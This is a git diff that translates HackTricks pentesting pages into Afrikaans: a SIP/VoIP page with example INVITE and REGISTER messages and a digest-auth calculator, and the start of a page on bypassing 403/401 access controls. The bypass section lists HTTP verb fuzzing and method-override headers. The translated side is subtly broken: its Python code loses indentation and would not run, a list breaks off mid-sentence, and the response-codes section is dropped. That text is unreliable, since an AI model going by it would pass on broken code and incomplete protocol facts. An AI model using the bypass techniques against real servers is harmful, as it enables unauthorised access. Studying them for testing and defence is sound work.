-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
-## Basic Information
+## Basiese Inligting
 
-SIP (Session Initiation Protocol) is a **signaling and call control protocol** widely used for establishing, modifying, and terminating multimedia sessions, including voice, video, and instant messaging, over IP networks. Developed by the **Internet Engineering Task Force (IETF)**, SIP is defined in **RFC 3261** and has become the de facto standard for VoIP and unified communications.
+SIP (Sessie Inisiasie Protokol) is 'n **seintegnologie- en oproepbeheerprotokol** wat wyd gebruik word vir die vestiging, wysiging en beëindiging van multimedia-sessies, insluitend spraak, video en onmiddellike boodskappe, oor IP-netwerke. Ontwikkel deur die **Internet Engineering Task Force (IETF)**, word SIP gedefinieer in **RFC 3261** en het die de facto standaard geword vir VoIP en verenigde kommunikasie.
 
-Some key features of SIP include:
+Sommige belangrike kenmerke van SIP sluit in:
 
-1. **Text-based Protocol**: SIP is a text-based protocol, which makes it human-readable and easier to debug. It is based on a request-response model, similar to HTTP, and uses methods like INVITE, ACK, BYE, and CANCEL for controlling call sessions.
-2. **Scalability and Flexibility**: SIP is highly scalable and can be used in small-scale deployments as well as large enterprise and carrier-grade environments. It can be easily extended with new features, making it adaptable to various use cases and requirements.
-3. **Interoperability**: SIP's widespread adoption and standardization ensure better interoperability between different devices, applications, and service providers, promoting seamless communication across various platforms.
-4. **Modular Design**: SIP works with other protocols like **RTP (Real-time Transport Protocol)** for media transmission and **SDP (Session Description Protocol)** for describing multimedia sessions. This modular design allows for greater flexibility and compatibility with different media types and codecs.
-5. **Proxy and Redirect Servers**: SIP can use proxy and redirect servers to facilitate call routing and provide advanced features like call forwarding, call transfer, and voicemail services.
-6. **Presence and Instant Messaging**: SIP is not limited to voice and video communication. It also supports presence and instant messaging, enabling a wide range of unified communication applications.
+1. **Tekstgebaseerde Protokol**: SIP is 'n tekstgebaseerde protokol, wat dit mensleesbaar maak en makliker maak om foute op te spoor. Dit is gebaseer op 'n versoek-antwoordmodel, soortgelyk aan HTTP, en gebruik metodes soos INVITE, ACK, BYE en CANCEL om oproepsessies te beheer.
+2. **Skalering en Veelsydigheid**: SIP is hoogs skaalbaar en kan gebruik word in klein- en grootmaat-ondernemings- en vervoerdersomgewings. Dit kan maklik uitgebrei word met nuwe funksies, wat dit aanpasbaar maak vir verskillende gevalle en vereistes.
+3. **Interoperabiliteit**: SIP se wye aanvaarding en standaardisering verseker beter interoperabiliteit tussen verskillende toestelle, toepassings en diensverskaffers, wat naadlose kommunikasie oor verskillende platforms bevorder.
+4. **Modulêre Ontwerp**: SIP werk saam met ander protokolle soos **RTP (Real-time Transport Protocol)** vir media-oordrag en **SDP (Session Description Protocol)** vir die beskrywing van multimedia-sessies. Hierdie modulêre ontwerp maak groter veelsydigheid en verenigbaarheid met verskillende mediatipes en kodeks moontlik.
+5. **Proxy- en Omskakelbedieners**: SIP kan gebruik maak van proxy- en omskakelbedieners om oproeprouting te fasiliteer en gevorderde funksies soos oproepstuur, oproepoordrag en voicemail-dienste te bied.
+6. **Teenwoordigheid en Onmiddellike Boodskappe**: SIP is nie beperk tot spraak- en video-kommunikasie nie. Dit ondersteun ook teenwoordigheid en onmiddellike boodskappe, wat 'n wye reeks verenigde kommunikasie-toepassings moontlik maak.
 
-Despite its many advantages, SIP can be complex to configure and manage, particularly when dealing with NAT traversal and firewall issues. However, its versatility, scalability, and extensive support across the industry make it a popular choice for VoIP and multimedia communication.
+Ten spyte van sy vele voordele kan SIP moeilik wees om te konfigureer en bestuur, veral wanneer dit kom by NAT-deurslag en vuurmuurprobleme. Tog maak sy veelsydigheid, skalering en uitgebreide ondersteuning in die bedryf dit 'n gewilde keuse vir VoIP- en multimedia-kommunikasie.
 
-### SIP Methods
+### SIP Metodes
 
-The core SIP methods defined in **RFC 3261** include:
+Die kern-SIP-metodes wat gedefinieer is in **RFC 3261** sluit in:
 
-1. **INVITE**: Used to **initiate a new session (call)** or modify an existing one. The INVITE method carries the session description (typically using SDP) to inform the recipient about the details of the proposed session, such as media types, codecs, and transport protocols.
-2. **ACK**: Sent to **confirm the receipt** of a final response to an INVITE request. The ACK method ensures the reliability of INVITE transactions by providing end-to-end acknowledgement.
-3. **BYE**: Used to **terminate an established session (call)**. The BYE method is sent by either party in the session to indicate that they wish to end the communication.
-4. **CANCEL**: Sent to **cancel a pending INVITE** request before the session is established. The CANCEL method allows the sender to abort an INVITE transaction if they change their mind or if there is no response from the recipient.
-5. **OPTIONS**: Used to **query the capabilities of a SIP server or user agent**. The OPTIONS method can be sent to request information about supported methods, media types, or other extensions without actually establishing a session.
-6. **REGISTER**: Used by a user agent to **register its current location with a SIP registrar server**. The REGISTER method helps in maintaining an up-to-date mapping between a user's SIP URI and their current IP address, enabling call routing and delivery.
+1. **INVITE**: Gebruik om 'n nuwe sessie (oproep) te **inisieer** of 'n bestaande een te wysig. Die INVITE-metode dra die sessiebeskrywing (gewoonlik met behulp van SDP) om die ontvanger in te lig oor die besonderhede van die voorgestelde sessie, soos mediatipes, kodeks en vervoerprotokolle.
+2. **ACK**: Gestuur om die ontvangs van 'n finale antwoord op 'n INVITE-versoek te **bevestig**. Die ACK-metode verseker die betroubaarheid van INVITE-transaksies deur end-to-end-erkennings te voorsien.
+3. **BYE**: Gebruik om 'n gevestigde sessie (oproep) te **beëindig**. Die BYE-metode word deur een van die partye in die sessie gestuur om aan te dui dat hulle die kommunikasie wil beëindig.
+4. **CANCEL**: Gestuur om 'n hangende INVITE-versoek te **kanselleer** voordat die sessie gevestig is. Die CANCEL-metode stel die sender in staat om 'n INVITE-transaksie af te breek as hulle van gedagte verander of as daar geen antwoord van die ontvanger is nie.
+5. **OPTIONS**: Gebruik om die vermoëns van 'n SIP-bediener of gebruikersagent te **ondersoek**. Die OPTIONS-metode kan gestuur word om inligting oor ondersteunde metodes, mediatipes of ander uitbreidings te versoek sonder om werklik 'n sessie te vestig.
+6. **REGISTER**: Gebruik deur 'n gebruikersagent om sy huidige ligging by 'n SIP-registreerderbediener te **registreer**. Die REGISTER-metode help om 'n opgedateerde koppeling tussen 'n gebruiker se SIP-URI en hul huidige IP-adres te handhaaf, wat oproeprouting en aflewering moontlik maak.
 
 {% hint style="warning" %}
-Note that to call someone it's **not neccesary to use the REGISTER** for anything.\
-However, it's possible that in order to perform an **INVITE** the caller needs to **authenticate** first or he will receive a **`401 Unauthorized`** response.
+Let daarop dat dit **nie nodig is om die REGISTER** vir enige iets te gebruik om iemand te bel nie.\
+Dit is egter moontlik dat die oproeper in orde om 'n **INVITE** uit te voer, eers moet **geïdentifiseer** word, anders sal hy 'n **`401 Unauthorized`**-antwoord ontvang.
 {% endhint %}
 
-In addition to these core methods, there are **several SIP extension methods** defined in other RFCs, such as:
+Naas hierdie kernmetodes is daar **verskeie SIP-uitbreidingsmetodes** wat in ander RFC's gedefinieer is, soos:
 
-1. **SUBSCRIBE**: Defined in RFC 6665, the SUBSCRIBE method is used to **request notifications** about the state of a specific resource, such as a user's presence or call status.
-2. **NOTIFY**: Also defined in RFC 6665, the NOTIFY method is sent by a server to **inform a subscribed user agent** about changes in the state of a monitored resource.
-3. **REFER**: Defined in RFC 3515, the REFER method is used to **request that the recipient performs a transfer or refers to a third party**. This is typically used for **call transfer** scenarios.
-4. **MESSAGE**: Defined in RFC 3428, the MESSAGE method is used to **send instant messages between SIP user agents**, enabling text-based communication within the SIP framework.
-5. **UPDATE**: Defined in RFC 3311, the UPDATE method allows **modifying a session without affecting the state of the existing dialog**. This is useful for updating session parameters, such as codecs or media types, during an ongoing call.
-6. **PUBLISH**: Defined in RFC 3903, the PUBLISH method is used by a user agent to **publish event state information to a server**, making it available to other interested parties.
-
-### SIP Response Codes
-
-* **1xx (Provisional Responses)**: These responses indicate that the request was received, and the server is continuing to process it.
-  * 100 Trying: The request was received, and the server is working on it.
-  * 180 Ringing: The callee is being alerted and will take the call.
-  * 183 Session Progress: Provides information about the progress of the call.
-* **2xx (Successful Responses)**: These responses indicate that the request was successfully received, understood, and accepted.
-  * 200 OK: The request was successful, and the server has fulfilled it.
-  * 202 Accepted: The request was accepted for processing, but it hasn't been completed yet.
-* **3xx (Redirection Responses)**: These responses indicate that further action is required to fulfill the request, typically by contacting an alternate resource.
-  * 300 Multiple Choices: There are multiple options available, and the user or client must choose one.
-  * 301 Moved Permanently: The requested resource has been assigned a new permanent URI.
-  * 302 Moved Temporarily: The requested resource is temporarily available at a different URI.
-  * 305 Use Proxy: The request must be sent to a specified proxy.
-* **4xx (Client Error Responses)**: These responses indicate that the request contains bad syntax or cannot be fulfilled by the server.
-  * 400 Bad Request: The request was malformed or invalid.
-  * 401 Unauthorized: The request requires user authentication.
-  * 403 Forbidden: The server understood the request but refuses to fulfill it.
-  * 404 Not Found: The requested resource was not found on the server.
-  * 408 Request Timeout: The server did not receive a complete request within the time it was prepared to wait.
-  * 486 Busy Here: The callee is currently busy and unable to take the call.
-* **5xx (Server Error Responses)**: These responses indicate that the server failed to fulfill a valid request.
-  * 500 Internal Server Error: The server encountered an error while processing the request.
-  * 501 Not Implemented: The server does not support the functionality required to fulfill the request.
-  * 503 Service Unavailable: The server is currently unable to handle the request due to maintenance or overload.
-* **6xx (Global Failure Responses)**: These responses indicate that the request cannot be fulfilled by any server.
-  * 600 Busy Everywhere: All possible destinations for the call are busy.
-  * 603 Decline: The callee does not wish to participate in the call.
-  * 604 Does Not Exist Anywhere: The requested resource is not available anywhere in the network.
-
-## Examples
-
-### SIP INVITE Example
+1. **SUBSCRIBE**: Gedefinieer in RFC 6665, word die SUBSCRIBE-metode gebruik om **kennisgewings te versoek** oor die toestand van 'n spesifieke hulpbron, soos 'n gebruiker se teenwoordigheid of oproepstatus.
+2. **NOTIFY**: Ook gedefinieer in RFC 6665, word die NOTIFY-metode deur 'n bediener gestuur om 'n geabonneerde gebruikersagent in te lig oor veranderinge in die toestand van 'n gemonitorde hulpbron.
+3. **REFER**: Gedefinieer in RFC 3515, word die REFER-metode gebruik om te **versoek dat die ontvanger 'n oorplasing uitvoer of na 'n derde party verwys**. Dit word tipies gebruik vir oproepoordrag-scenarios.
+4. **MESSAGE**: Gedefinieer in RFC
+## Voorbeelde
 
+### SIP INVITE Voorbeeld
 ```
 INVITE sip:jdoe@example.com SIP/2.0
 Via: SIP/2.0/UDP pc33.example.com;branch=z9hG4bK776asdhds
@@ -110,43 +76,41 @@ t=0 0
 m=audio 49170 RTP/AVP 0
 a=rtpmap:0 PCMU/8000te
 ```
-
 

 
-Each Param Explained
+Elke Parameter Verduidelik
 
-1. **Request-Line**: `INVITE sip:jdoe@example.com SIP/2.0` - This line indicates the method (INVITE), the request URI (sip:[jdoe@example.com](mailto:jdoe@example.com)), and the SIP version (SIP/2.0).
-2. **Via**: `Via: SIP/2.0/UDP pc33.example.com;branch=z9hG4bK776asdhds` - The Via header specifies the transport protocol (UDP) and the client's address (pc33.example.com). The "branch" parameter is used for loop detection and transaction matching.
-3. **Max-Forwards**: `Max-Forwards: 70` - This header field limits the number of times the request can be forwarded by proxies to avoid infinite loops.
-4. **To**: `To: John Doe ` - The To header specifies the recipient of the call, including their display name (John Doe) and SIP URI (sip:[jdoe@example.com](mailto:jdoe@example.com)).
-5. **From**: `From: Jane Smith ;tag=1928301774` - The From header specifies the sender of the call, including their display name (Jane Smith) and SIP URI (sip:[jsmith@example.org](mailto:jsmith@example.org)). The "tag" parameter is used to uniquely identify the sender's role in the dialog.
-6. **Call-ID**: `Call-ID: a84b4c76e66710` - The Call-ID header uniquely identifies a call session between two user agents.
-7. **CSeq**: `CSeq: 314159 INVITE` - The CSeq header contains a sequence number and the method used in the request. It's used to match responses to requests and detect out-of-order messages.
-8. **Contact**: `Contact: ` - The Contact header provides a direct route to the sender, which can be used for subsequent requests and responses.
-9. **User-Agent**: `User-Agent: ExampleSIPClient/1.0` - The User-Agent header provides information about the software or hardware of the sender, including its name and version.
-10. **Allow**: `Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, NOTIFY, MESSAGE, SUBSCRIBE, INFO` - The Allow header lists the SIP methods supported by the sender. This helps the recipient understand which methods can be used during the communication.
-11. **Content-Type**: `Content-Type: application/sdp` - The Content-Type header specifies the media type of the message body, in this case, SDP (Session Description Protocol).
-12. **Content-Length**: `Content-Length: 142` - The Content-Length header indicates the size of the message body in bytes.
-13. **Message Body**: The message body contains the SDP session description, which includes information about the media types, codecs, and transport protocols for the proposed session.
+1. **Request-Line**: `INVITE sip:jdoe@example.com SIP/2.0` - Hierdie lyn dui die metode (INVITE), die versoek URI (sip:[jdoe@example.com](mailto:jdoe@example.com)), en die SIP-weergawe (SIP/2.0) aan.
+2. **Via**: `Via: SIP/2.0/UDP pc33.example.com;branch=z9hG4bK776asdhds` - Die Via-kop spesifiseer die vervoerprotokol (UDP) en die klient se adres (pc33.example.com). Die "branch" parameter word gebruik vir lusopsporing en transaksie-passing.
+3. **Max-Forwards**: `Max-Forwards: 70` - Hierdie kopvel beperk die aantal kere wat die versoek deur proksi's gestuur kan word om oneindige lusse te voorkom.
+4. **To**: `To: John Doe ` - Die To-kop spesifiseer die ontvanger van die oproep, insluitend hul vertoonnaam (John Doe) en SIP URI (sip:[jdoe@example.com](mailto:jdoe@example.com)).
+5. **From**: `From: Jane Smith ;tag=1928301774` - Die From-kop spesifiseer die afsender van die oproep, insluitend hul vertoonnaam (Jane Smith) en SIP URI (sip:[jsmith@example.org](mailto:jsmith@example.org)). Die "tag" parameter word gebruik om die afsender se rol in die dialoog uniek te identifiseer.
+6. **Call-ID**: `Call-ID: a84b4c76e66710` - Die Call-ID-kop identifiseer uniek 'n oproepsessie tussen twee gebruikersagtente.
+7. **CSeq**: `CSeq: 314159 INVITE` - Die CSeq-kop bevat 'n volgnummer en die metode wat in die versoek gebruik word. Dit word gebruik om reaksies aan versoek te koppel en uit-volgorde boodskappe op te spoor.
+8. **Contact**: `Contact: ` - Die Contact-kop bied 'n direkte roete na die afsender, wat gebruik kan word vir volgende versoek en reaksies.
+9. **User-Agent**: `User-Agent: ExampleSIPClient/1.0` - Die User-Agent-kop verskaf inligting oor die sagteware of hardeware van die afsender, insluitend die naam en weergawe.
+10. **Allow**: `Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, NOTIFY, MESSAGE, SUBSCRIBE, INFO` - Die Allow-kop lys die SIP-metodes wat deur die afsender ondersteun word. Dit help die ontvanger om te verstaan watter metodes tydens die kommunikasie gebruik kan word.
+11. **Content-Type**: `Content-Type: application/sdp` - Die Content-Type-kop spesifiseer die media-tipe van die boodskaplêer, in hierdie geval SDP (Session Description Protocol).
+12. **Content-Length**: `Content-Length: 142` - Die Content-Length-kop dui die grootte van die boodskaplêer in bytes aan.
+13. **Boodskaplêer**: Die boodskaplêer bevat die SDP-sessiebeskrywing, wat inligting bevat oor die media-tipes, kodeks, en vervoerprotokolle vir die voorgestelde sessie.
 
-* `v=0` - Protocol version (0 for SDP)
-* `o=jsmith 2890844526 2890842807 IN IP4 pc33.example.com` - Originator and session identifier
-* `s=-` - Session name (a single hyphen indicates no session name)
-* `c=IN IP4 pc33.example.com` - Connection information (network type, address type, and address)
-* `t=0 0` - Timing information (start and stop times, 0 0 means the session is not bounded)
-* `m=audio 49170 RTP/AVP 0` - Media description (media type, port number, transport protocol, and format list). In this case, it specifies an audio stream using RTP/AVP (Real-time Transport Protocol / Audio Video Profile) and format 0 (PCMU/8000).
-* `a=rtpmap:0 PCMU/8000` - Attribute mapping the format (0) to the codec (PCMU) and its clock rate (8000 Hz).
+* `v=0` - Protokolweergawe (0 vir SDP)
+* `o=jsmith 2890844526 2890842807 IN IP4 pc33.example.com` - Oorsprong en sessie-identifiseerder
+* `s=-` - Sessienaam (een enkele koppelteken dui aan dat daar geen sessienaam is nie)
+* `c=IN IP4 pc33.example.com` - Verbindingsinligting (netwerk tipe, adres tipe, en adres)
+* `t=0 0` - Tydsinligting (begin- en eindtye, 0 0 beteken dat die sessie nie begrens is nie)
+* `m=audio 49170 RTP/AVP 0` - Media-beskrywing (media tipe, poortnommer, vervoerprotokol, en formaatlys). In hierdie geval spesifiseer dit 'n klankstroom wat gebruik maak van RTP/AVP (Real-time Transport Protocol / Audio Video Profile) en formaat 0 (PCMU/8000).
+* `a=rtpmap:0 PCMU/8000` - Eienskap wat die formaat (0) aan die kodek (PCMU) en sy klokspoed (8000 Hz) koppel.
 
 

 
-### SIP REGISTER Example
+### SIP REGISTER Voorbeeld
 
-The REGISTER method is used in Session Initiation Protocol (SIP) to allow a user agent (UA), such as a VoIP phone or a softphone, to **register its location with a SIP registrar server**. This process lets the server know **where to route incoming SIP requests destined for the registered user**. The registrar server is usually part of a SIP proxy server or a dedicated registration server.
+Die REGISTER-metode word in die Session Initiation Protocol (SIP) gebruik om 'n gebruikersagtent (UA), soos 'n VoIP-foon of 'n sagtfoon, in staat te stel om **sy ligging by 'n SIP-registrasiebediener te registreer**. Hierdie proses laat die bediener weet **waarheen inkomende SIP-versoeke vir die geregistreerde gebruiker gestuur moet word**. Die registrasiebediener is gewoonlik deel van 'n SIP-proksibediener of 'n toegewyde registrasiebediener.
 
-Here's a detailed example of the SIP messages involved in a REGISTER authentication process:
-
-1. Initial **REGISTER** request from UA to the registrar server:
+Hier is 'n gedetailleerde voorbeeld van die SIP-boodskappe wat betrokke is by 'n REGISTER-verifikasieproses:
 
+1. Aanvanklike **REGISTER** versoek van UA na die registrasiebediener:
 ```yaml
 REGISTER sip:example.com SIP/2.0
 Via: SIP/2.0/UDP 192.168.1.100:5060;branch=z9hG4bK776asdhds
@@ -159,11 +123,9 @@ Contact: ;expires=3600
 Expires: 3600
 Content-Length: 0
 ```
+Hierdie aanvanklike REGISTER-boodskap word deur die UA (Alice) na die registrasiebediener gestuur. Dit sluit belangrike inligting in soos die gewenste registrasie-tydsduur (Expires), die gebruiker se SIP URI (sip:[alice@example.com](mailto:alice@example.com)), en die gebruiker se kontakadres (sip:alice@192.168.1.100:5060).
 
-This initial REGISTER message is sent by the UA (Alice) to the registrar server. It includes important information such as the desired registration duration (Expires), the user's SIP URI (sip:[alice@example.com](mailto:alice@example.com)), and the user's contact address (sip:alice@192.168.1.100:5060).
-
-2. **401 Unauthorized** response from the registrar server:
-
+2. **401 Onbevoegd** antwoord van die registrasiebediener:
 ```css
 cssCopy codeSIP/2.0 401 Unauthorized
 Via: SIP/2.0/UDP 192.168.1.100:5060;branch=z9hG4bK776asdhds
@@ -174,11 +136,9 @@ CSeq: 1 REGISTER
 WWW-Authenticate: Digest realm="example.com", nonce="abcdefghijk", algorithm=MD5, qop="auth"
 Content-Length: 0
 ```
+Die registrasiebediener reageer met 'n "401 Onbevoegde" boodskap, wat 'n "WWW-Authenticate" kop bevat. Hierdie kop bevat inligting wat vereis word vir die UA om homself te verifieer, soos die **verifikasiegebied, nonce, en algoritme**.
 
-The registrar server responds with a "401 Unauthorized" message, which includes a "WWW-Authenticate" header. This header contains information required for the UA to authenticate itself, such as the **authentication realm, nonce, and algorithm**.
-
-3. REGISTER request **with authentication credentials**:
-
+3. REGISTREER versoek **met verifikasielegitimasie**:
 ```vbnet
 REGISTER sip:example.com SIP/2.0
 Via: SIP/2.0/UDP 192.168.1.100:5060;branch=z9hG4bK776asdhds
@@ -192,28 +152,26 @@ Expires: 3600
 Authorization: Digest username="alice", realm="example.com", nonce="abcdefghijk", uri="sip:example.com", response="65a8e2285879283831b664bd8b7f14d4", algorithm=MD5, cnonce="lmnopqrst", qop=auth, nc=00000001
 Content-Length: 0
 ```
+Die UA stuur 'n ander REGISTER versoek, hierdie keer met die **"Authorization" kop met die nodige geloofsbriewe, soos die gebruikersnaam, realm, nonce, en 'n responswaarde** wat bereken word met behulp van die verskafte inligting en die gebruiker se wagwoord.
 
-The UA sends another REGISTER request, this time including the **"Authorization" header with the necessary credentials, such as the username, realm, nonce, and a response value** calculated using the provided information and the user's password.
-
-This is how the **Authorizarion response** is calculated:
-
+So word die **Authorizarion respons** bereken:
 ```python
 import hashlib
 
 def calculate_sip_md5_response(username, password, realm, method, uri, nonce, nc, cnonce, qop):
-    # 1. Calculate HA1 (concatenation of username, realm, and password)
-    ha1_input = f"{username}:{realm}:{password}"
-    ha1 = hashlib.md5(ha1_input.encode()).hexdigest()
+# 1. Calculate HA1 (concatenation of username, realm, and password)
+ha1_input = f"{username}:{realm}:{password}"
+ha1 = hashlib.md5(ha1_input.encode()).hexdigest()
 
-    # 2. Calculate HA2 (concatenation of method and uri)
-    ha2_input = f"{method}:{uri}"
-    ha2 = hashlib.md5(ha2_input.encode()).hexdigest()
+# 2. Calculate HA2 (concatenation of method and uri)
+ha2_input = f"{method}:{uri}"
+ha2 = hashlib.md5(ha2_input.encode()).hexdigest()
 
-    # 3. Calculate the final response value (concatenation of h1, stuff and h2)
-    response_input = f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}"
-    response = hashlib.md5(response_input.encode()).hexdigest()
+# 3. Calculate the final response value (concatenation of h1, stuff and h2)
+response_input = f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}"
+response = hashlib.md5(response_input.encode()).hexdigest()
 
-    return response
+return response
 
 # Example usage
 username = "alice"
@@ -229,9 +187,7 @@ qop = "auth"
 response = calculate_sip_md5_response(username, password, realm, method, uri, nonce, nc, cnonce, qop)
 print(f"MD5 response value: {response}")
 ```
-
-4. **Successful registration** response from the registrar server:
-
+4. **Suksesvolle registrasie** respons van die registrasiebediener:
 ```yaml
 SIP/2.0 200 OK
 Via: SIP/2.0/UDP 192.168.1.100:5060;branch=z9hG4bK776asdhds
@@ -243,27 +199,26 @@ Contact: ;expires=3600
 Expires: 3600
 Content-Length: 0
 ```
+Nadat die registrasieserver die voorsiene geloofsbriewe geverifieer het, **stuur dit 'n "200 OK" antwoord om aan te dui dat die registrasie suksesvol was**. Die antwoord bevat die geregistreerde kontakinligting en die vervaltyd vir die registrasie. Op hierdie punt is die gebruikersagent (Alice) suksesvol geregistreer by die SIP-registrasieserver, en inkomende SIP-versoeke vir Alice kan na die toepaslike kontakadres gerouteer word.
 
-After the registrar server verifies the provided credentials, **it sends a "200 OK" response to indicate that the registration was successful**. The response includes the registered contact information and the expiration time for the registration. At this point, the user agent (Alice) is successfully registered with the SIP registrar server, and incoming SIP requests for Alice can be routed to the appropriate contact address.
-
-### Call Example
+### Oproepvoorbeeld
 
 

 
 {% hint style="info" %}
-It's not mentioned, but User B needs to have sent a **REGISTER message to Proxy 2** before he is able to receive calls.
+Dit word nie genoem nie, maar Gebruiker B moet 'n **REGISTER-boodskap na Proxy 2 gestuur het** voordat hy oproepe kan ontvang.
 {% endhint %}
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

diff --git a/network-services-pentesting/pentesting-web/403-and-401-bypasses.md b/network-services-pentesting/pentesting-web/403-and-401-bypasses.md
index eed0e4e88..b577fc3a3 100644
--- a/network-services-pentesting/pentesting-web/403-and-401-bypasses.md
+++ b/network-services-pentesting/pentesting-web/403-and-401-bypasses.md
@@ -1,119 +1,118 @@
-# 403 & 401 Bypasses
+# 403 & 401 Deurpasse
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
 

 
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
+**Onmiddellik beskikbare opset vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê.
 
 {% embed url="https://pentest-tools.com/" %}
 
-## HTTP Verbs/Methods Fuzzing
+## HTTP Verbs/Metodes Fuzzing
 
-Try using **different verbs** to access the file: `GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK`
+Probeer om **verskillende metodes** te gebruik om by die lêer te kom: `GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK`
 
-* Check the response headers, maybe some information can be given. For example, a **200 response** to **HEAD** with `Content-Length: 55` means that the **HEAD verb can access the info**. But you still need to find a way to exfiltrate that info.
-* Using a HTTP header like `X-HTTP-Method-Override: PUT` can overwrite the verb used.
-* Use **`TRACE`** verb and if you are very lucky maybe in the response you can see also the **headers added by intermediate proxies** that might be useful.
